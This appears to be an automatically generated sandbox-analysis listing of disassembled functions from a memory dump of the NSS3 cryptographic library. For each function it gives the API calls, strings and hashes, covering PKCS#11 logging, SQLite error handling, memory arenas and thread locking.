API call with %s database connection pointer, xrefs: 6C844CF6

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: ff81e8d79d71d727696c4c177e522089026441cb52a8b3210456c1e53bcbda43
Instruction ID: 988e4d9a09574136d848f99557f2a2e7bc58048e6193edd759e818f707393044
Opcode Fuzzy Hash: ff81e8d79d71d727696c4c177e522089026441cb52a8b3210456c1e53bcbda43
Instruction Fuzzy Hash: A2317772A0491CA7E7380E249B047A5B32177C231AF5ACD36D8245BE14CB74AC16C3E2

Function 6C7A2DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C7A2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A2E33

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C7A2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C7A2E81

Strings

C_InitPIN, xrefs: 6C7A2DF1
(CK_INVALID_HANDLE), xrefs: 6C7A2E2C
pPin = 0x%p, xrefs: 6C7A2E63
ulPinLen = %d, xrefs: 6C7A2E7C
hSession = 0x%x, xrefs: 6C7A2E0E, 6C7A2E1E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 5a10260c4cc573ba40c7a2e9f8475cd169a25cd5fa1404b8a4fc778922809f55
Instruction ID: 55ca63f932814b56694837c9ab517b0352302d8f86d8c0a526fc939bec17de72
Opcode Fuzzy Hash: 5a10260c4cc573ba40c7a2e9f8475cd169a25cd5fa1404b8a4fc778922809f55
Instruction Fuzzy Hash: 6E31D071602154ABDB308B998F4CB9A77B9EB4631DF048535E80DA7B12DB34BC49CBD2

Function 6C7A6EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C7A6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7A6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7A6F53

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7A6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C7A6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C7A6FA1

Strings

pPart = 0x%p, xrefs: 6C7A6F83
(CK_INVALID_HANDLE), xrefs: 6C7A6F4C
ulPartLen = %d, xrefs: 6C7A6F9C
C_DigestUpdate, xrefs: 6C7A6F11
hSession = 0x%x, xrefs: 6C7A6F2E, 6C7A6F3E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 5d7cf4788b445ca9e335bdc9556f9b155b7c76e9867f58ab5543091f42759f3b
Instruction ID: 4b93e1f42eeb91376c8466c1885b5b57253024eef81e0e19b44b2d5813fb5491
Opcode Fuzzy Hash: 5d7cf4788b445ca9e335bdc9556f9b155b7c76e9867f58ab5543091f42759f3b
Instruction Fuzzy Hash: 6131C135602154AFDB309BA8DE4CB9A77B1EB8631DF084435E809A7B12DB34BD49CBD1

Function 6C774880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7748A2
PORT_NewArena_Util.NSS3(00000800), ref: 6C7748C4
PORT_ArenaAlloc_Util.NSS3(?,000000BC), ref: 6C7748D8
memset.VCRUNTIME140(00000004,00000000,000000B8), ref: 6C7748FB
PORT_ArenaAlloc_Util.NSS3(?,00000018), ref: 6C774908
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C774947
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C77496C
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C774988
SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C898DAC,?), ref: 6C7749DE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7749FD
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C774ACB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaError$Arena_Item_$CopyDecodeFreeQuickmemset
String ID:
API String ID: 4201528089-0
Opcode ID: 6a2f1c27028884a1820ec437c1aea44cd3440de0aa2d75228a860f1ad960717b
Instruction ID: f007c7d7d636611751268409fb1c86a2ac0a58eea30fa4b53406d8150e4eb4d6
Opcode Fuzzy Hash: 6a2f1c27028884a1820ec437c1aea44cd3440de0aa2d75228a860f1ad960717b
Instruction Fuzzy Hash: D251F271A003098BEF308F65DE4579B37E8BB41308F114538E919AAB91E771D418DF76

Function 6C842D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C842D9F

Part of subcall function 6C6FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C75F9C9,?,6C75F4DA,6C75F9C9,?,?,6C72369A), ref: 6C6FCA7A
Part of subcall function 6C6FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6FCB26

sqlite3_exec.NSS3(?,?,6C842F70,?,?), ref: 6C842DF9
sqlite3_free.NSS3(00000000), ref: 6C842E2C
sqlite3_free.NSS3(?), ref: 6C842E3A
sqlite3_free.NSS3(?), ref: 6C842E52
sqlite3_mprintf.NSS3(6C8AAAF9,?), ref: 6C842E62
sqlite3_free.NSS3(?), ref: 6C842E70
sqlite3_free.NSS3(?), ref: 6C842E89
sqlite3_free.NSS3(?), ref: 6C842EBB
sqlite3_free.NSS3(?), ref: 6C842ECB
sqlite3_free.NSS3(00000000), ref: 6C842F3E
sqlite3_free.NSS3(?), ref: 6C842F4C

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: dc93d841dd5fad43cefc3e36de4a4e9fc76e8fb66b68b0bed9f9b02b3aa30b29
Instruction ID: dab63c2c2cbb5af3b0babc9c70a5736d099bd7ad056b0d6129e5b7028318f722
Opcode Fuzzy Hash: dc93d841dd5fad43cefc3e36de4a4e9fc76e8fb66b68b0bed9f9b02b3aa30b29
Instruction Fuzzy Hash: 1B61B2B5E042098BEB20CFA8D984BDEB7B2EF49348F118424DC15E7701E739E855CBA5

Function 6C6F4C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4D97
PR_Lock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4DBA
PR_WaitCondVar.NSS3 ref: 6C6F4DD4
PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4DEF

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 50be07e2d019ca0a30df2a2f784978a7c9f76f680f727127aa54ec30d6c1373a
Instruction ID: c4cabf4598df70b83e39adecf617076c54a5c36936acca1d704af290c3936c3f
Opcode Fuzzy Hash: 50be07e2d019ca0a30df2a2f784978a7c9f76f680f727127aa54ec30d6c1373a
Instruction Fuzzy Hash: 8B4191B5A08611CFCB20AF78D18816977F5BF05328F054639D8989BB00E730E886CBD5

Function 6C77E910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C77E93B
PR_SetError.NSS3(FFFFE075,00000000), ref: 6C77E94E
PORT_Alloc_Util.NSS3(00000001), ref: 6C77E995
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C77E9A7
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C77E9CA
PORT_Strdup_Util.NSS3(6C8B933E), ref: 6C77EA17
PORT_Alloc_Util.NSS3(00000001), ref: 6C77EA28

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C77EA3C
free.MOZGLUE(?), ref: 6C77EA69

Strings

http://, xrefs: 6C77E935

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
String ID: http://
API String ID: 3982757857-1121587658
Opcode ID: e35061432d7fa0cfb52bf1bbe30feb32dc89223cd97221660fbe41762cf53549
Instruction ID: 8037166cca4e4c31e86bc06a29c535e45554a2a079ff18e3e5247710f5ca0888
Opcode Fuzzy Hash: e35061432d7fa0cfb52bf1bbe30feb32dc89223cd97221660fbe41762cf53549
Instruction Fuzzy Hash: 83416A6694860E4FEF704A688E807FA7FA5AB4731CF140031D894A7F42E2229546CBF7

Function 6C794E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C794E90
EnterCriticalSection.KERNEL32 ref: 6C794EA9
TlsGetValue.KERNEL32 ref: 6C794EC6
EnterCriticalSection.KERNEL32 ref: 6C794EDF
PL_HashTableLookup.NSS3 ref: 6C794EF8
PR_Unlock.NSS3 ref: 6C794F05
PR_Now.NSS3 ref: 6C794F13
PR_Unlock.NSS3 ref: 6C794F3A

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

bUyl, xrefs: 6C794E5C
bUyl, xrefs: 6C794F3F

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bUyl$bUyl
API String ID: 326028414-4202475308
Opcode ID: fa25cdb193536a1c426e3bc67db21090701fae0b03651666c970930530c1e58a
Instruction ID: c1a13988690f978bb4b4278f0058345b720fb03acfa6c8a37690b58a06c55176
Opcode Fuzzy Hash: fa25cdb193536a1c426e3bc67db21090701fae0b03651666c970930530c1e58a
Instruction Fuzzy Hash: 1D4148B4A046059FCB10EF78D1848AABBF0FF49358B058679EC599B711EB30E895CBD1

Function 6C7BECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C7BDE64), ref: 6C7BED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7BED22

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

PL_FreeArenaPool.NSS3(?), ref: 6C7BED4A
PL_FinishArenaPool.NSS3(?), ref: 6C7BED6B
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7BED38

Part of subcall function 6C6F4C70: TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
Part of subcall function 6C6F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
Part of subcall function 6C6F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C7BED52
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7BED83
PL_FreeArenaPool.NSS3(?), ref: 6C7BED95
PL_FinishArenaPool.NSS3(?), ref: 6C7BED9D

Part of subcall function 6C7D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C7D127C,00000000,00000000,00000000), ref: 6C7D650E

Strings

security, xrefs: 6C7BED06

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 1077638ef55148c400991d23303424b27f406dd05b984560bb913197df747fee
Instruction ID: 800bef98b8cdac35a7a42216f96c74972949155a071c9da6d0e01fe728124171
Opcode Fuzzy Hash: 1077638ef55148c400991d23303424b27f406dd05b984560bb913197df747fee
Instruction Fuzzy Hash: 371157769002186BE6205A65AF4ABBB7278AF0160CF060DB4E815B2F40FB74B70CD6D6

Function 6C7A2CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C7A2CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C7A2D07

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C7A2D22

Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880B88
Part of subcall function 6C8809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C880C5D
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C880C8D
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880C9C
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880CD1
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880CEC
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880CFB
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880D16
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C880D26
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D35
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C880D65
Part of subcall function 6C8809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C880D70
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880D90
Part of subcall function 6C8809D0: free.MOZGLUE(00000000), ref: 6C880D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C7A2D3B

Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880BAB
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880BBA
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C7A2D54

Part of subcall function 6C8809D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C880BCB
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880BDE
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880C16

Strings

pLabel = 0x%p, xrefs: 6C7A2D4F
C_InitToken, xrefs: 6C7A2CE7
slotID = 0x%x, xrefs: 6C7A2D02
pPin = 0x%p, xrefs: 6C7A2D1D
ulPinLen = %d, xrefs: 6C7A2D36

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: c2a4dd6b859e587025d4127a9ef4f6cab45ab94ddb15e988a4e7b8b825f83e88
Instruction ID: 608788fc972c3f0b3014c7d2a9c26859745dc8dcab09ff6540c2c9cd548a5ff8
Opcode Fuzzy Hash: c2a4dd6b859e587025d4127a9ef4f6cab45ab94ddb15e988a4e7b8b825f83e88
Instruction Fuzzy Hash: 0A21C475202144AFDB209F95DF4DA557BB1EB8631DF448570E90897A23CB30BC4ACBA1

Function 6C7A2AF0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismList), ref: 6C7A2B0C
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C7A2B59

Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880BAB
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880BBA
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D7E

PR_LogPrint.NSS3( pMechanismList = 0x%p,?), ref: 6C7A2B3E

Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880B88
Part of subcall function 6C8809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C880C5D
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C880C8D
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880C9C
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880CD1
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880CEC
